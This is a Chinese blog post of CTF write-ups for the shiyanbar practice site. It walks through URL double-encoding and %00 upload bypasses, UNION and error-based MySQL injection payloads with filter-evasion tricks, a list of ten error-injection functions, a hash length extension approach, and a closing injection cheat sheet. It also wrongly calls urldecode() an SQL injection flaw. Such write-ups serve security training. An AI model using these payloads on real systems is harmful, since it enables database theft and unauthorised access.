一些和sql注入有关的web题wp

最新推荐文章于 2025-04-15 18:03:29 发布

Damya

最新推荐文章于 2025-04-15 18:03:29 发布

阅读量378

点赞数

分类专栏：实验吧 CTF 文章标签： WEB sql注入

本文链接：https://blog.youkuaiyun.com/qq_43306559/article/details/103395121

版权

CTF 同时被 2 个专栏收录

3 篇文章

订阅专栏

实验吧

1 篇文章

订阅专栏

本文深入探讨SQL注入的原理及防御方法，通过实战案例解析如何利用SQL注入获取敏感信息，包括数据库名、表名、列名及具体数据，并介绍了常见SQL注入函数及绕过技巧。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

PHP大法

http://ctf5.shiyanbar.com/DUTCTF/index.php

页面：

Notice: Use of undefined constant id - assumed 'id' in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2

Notice: Undefined index: id in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2

Deprecated: Function eregi() is deprecated in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2

Notice: Use of undefined constant id - assumed 'id' in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7

Notice: Use of undefined constant id - assumed 'id' in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7

Notice: Undefined index: id in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7

Notice: Use of undefined constant id - assumed 'id' in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 8


Can you authenticate to this website? index.php.txt

访问index.php.txt

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?

eregi()函数查找数组中的字符串，当查找到“hackerDJ”时输出“not allowed！”
urldecode()函数存在sql注入漏洞，会对字符串进行二次编码
只要输入二次编码后的字符串就行
%25解码后为%，与后面的68结合成%68进行二次解码，解码为h

payload:http://ctf5.shiyanbar.com/DUTCTF/index.php?id=%2568ackerDJ

上传绕过

http://ctf5.shiyanbar.com/web/upload

进入是个文件上传页面，尝试上传一句话木马（.php），提示必须上传图片格式
上传图片后提示后缀必须为.php
文件上传绕过，有四种方法：文件名大小写绕过，特殊文件名绕过，0x00截断绕过，.htaccess文件攻击
这题用%00截断

简单的sql注入

提示有过滤
http://ctf5.shiyanbar.com/423/web/

源码：

<html>
<head>
<title>1</title>
</head>
<body>
<div style="text-align:center">
<h2>flag<h2>
<h3>到底过滤了什么东西？<h3>
<form action="" method="get">
<input name="id" type="text"/>
<input type="submit" />
</form>

查看源代码发现是get传参
id=1,name=baloteli
1’ 报错
查表字段union select 被过滤
unionunion selectselect 空格被过滤
试了一堆，过滤了and、union、select、空格、from和where，所以构造语句要写两遍
用database()函数查看id下的信息
1' unionunion selectselect database()'
出现web1用户

ID: 1'  union select database()'
name: baloteli
ID: 1'  union select database()'
name: web1

接着查表
语句：1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1

出现两条关键语句

ID: 1'  union select table_name  from information_schema.tables  where '1'='1
name: admin
ID: 1'  union select table_name  from information_schema.tables  where '1'='1
name: flag

再查询字段名：1' unionunion selectselect column_namcolumn_namee fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name='flag

ID: 1' union select column_name  from information_schema.columns  where table_name='flag
name: baloteli
ID: 1' union select column_name  from information_schema.columns  where table_name='flag
name: flag
ID: 1' union select column_name  from information_schema.columns  where table_name='flag
name: id

出现flag字段，最后直接查flag
1' unionunion selectselect flag fromfrom flag wherewhere '1'='1

得到flag

简单的sql注入2

提示有回显
http://ctf5.shiyanbar.com/web/index_2.php

按照上一题的思路
输入1，1’报错，1 ’ 回显SQLi detected!
空格被过滤
1' union select table_name from information_schema.tables where '1'='1
空格用/**/代替
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
得到关键语句

ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: admin
ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: flag
ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: web_1

接着查字段名
1' union select column_name from information_schema.columns where table_name='flag
1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
得到flag字段

ID: 1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
name: flag

查flag
1' union select flag from flag where '1'='1
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
得到flag

简单的sql注入3

提示mysql报错注入
http://ctf5.shiyanbar.com/web/index_3.php

输入1，出现Hello！
输入1’，报错：

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\h43a1W3\phpstudy\WWW\web\index_3.php on line 30
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

报错提示了mysql_fetch_array()函数
函数定义:
mysql_fetch_array() 函数从结果集中取得一行作为关联数组，或数字数组，或二者兼有
返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false。

上网找了十种mysql报错注入函数

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

尝试发现前三个函数均返回Don’t!,尝试用exp()
爆库名:'or EXP(~(SELECT * from(select database())a))#
出现 DOUBLE value is out of range in 'exp(~((select 'web1' from dual)))'
爆表名：'or EXP(~(SELECT * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
出现 DOUBLE value is out of range in 'exp(~((select 'flag,web_1' from dual)))'
爆列名：'or EXP(~(SELECT * from(select group_concat(column_name) from information_schema.columns where table_name='flag')a))#
出现 DOUBLE value is out of range in 'exp(~((select 'flag,id' from dual)))'
查flag：'or EXP(~(SELECT * from(select group_concat(flag) from flag)a))#
得到flag
DOUBLE value is out of range in 'exp(~((select 'flag{Y0u_@r3_5O_dAmn_90Od}' from dual)))'

让我进去

相信你一定能拿到想要的
Hint:你可能希望知道服务器端发生了什么。。
http://ctf5.shiyanbar.com/web/kzhan.php

查看源码，发现是post传参
随便传个username和password值，用burpsuite抓包，改cookie里source=1，得到源码

<html>
<body>

<pre>
$flag = "XXXXXXXXXXXXXXXXXXXXXXX";
$secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for security!

$username = $_POST["username"];
$password = $_POST["password"];

if (!empty($_COOKIE["getmein"])) {
    if (urldecode($username) === "admin" && urldecode($password) != "admin") {
        if ($COOKIE["getmein"] === md5($secret . urldecode($username . $password))) {
            echo "Congratulations! You are a registered user.\n";
            die ("The flag is ". $flag);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("You are not an admin! LEAVE.");
    }
}

setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));

if (empty($_COOKIE["source"])) {
    setcookie("source", 0, time() + (60 * 60 * 24 * 7));
}
else {
    if ($_COOKIE["source"] != 0) {
        echo ""; // This source code is outputted here
    }
}
    </pre>
<h1>Admins Only!</h1>
<p>If you have the correct credentials, log in below. If not, please LEAVE.</p>
<form method="POST">
    Username: <input type="text" name="username"> <br>
    Password: <input type="password" name="password"> <br>
    <button type="submit">Submit</button>
</form>

</body>
</html>

需要构造一个符合
$COOKIE["getmein"] === md5($secret . urldecode($username . $password))
setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));
的getmein条件
$secret为长度15的字符串，构造一个前面为xxxxxxxxxxxxxxxadminadmin的大于64位的字符串，得到其hash值

Hash拓展长度攻击

这个看起来有点简单！

http://ctf5.shiyanbar.com/8/index.php?id=1

输入1’ ，报错：mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\h43a1W3\phpstudy\WWW\8\index.php on line 35
继续输入 and 1=1，没报错,and 1=2，返回空表，存在注入
order by 1,2 没报错，3报错
查数据库 and 1=2 union select 1,database() 查出表my_db
查数据库版本 and 1=2 union select 1,version() 5.5.47
接着查表 and 1=2 union select 1, table_name from information_schema.tables
出现 news thiskey admin 三个关键字段名
查列 and 1=2 union select 1, column_name from information_schema.columns where table_schema='my_db' and table_name='thiskey' 得到字段k0y
然后查flag and 1=2 union select 1, k0y from thiskey

以上的总结

遇到有sql注入提示的题目：

and 1=1 and 1=2 检验是否存在sql注入
查数据库 and 1=2 union select 1,database()
查数据库版本 and 1=2 union select 1,version()
查表 and 1=2 union select 1, table_name from information_schema.tables
查列 and 1=2 union select 1, column_name from information_schema.columns where table_schema='' and table_name=''
查flag and 1=2 union select 1, from

资料

对于mysql和Infobright等数据库，information_schema数据库中的表都是只读的，不能进行更新、删除和插入等操作，也不能加触发器，因为它们实际只是一个视图，不是基本表，没有关联的文件。
information_schema.tables存储了数据表的元数据信息，下面对常用的字段进行介绍：
table_schema: 记录数据库名；
table_name: 记录数据表名；
engine : 存储引擎；
table_rows: 关于表的粗略行估计；
data_length : 记录表的大小（单位字节）；
index_length : 记录表的索引的大小；
row_format: 可以查看数据表是否压缩过；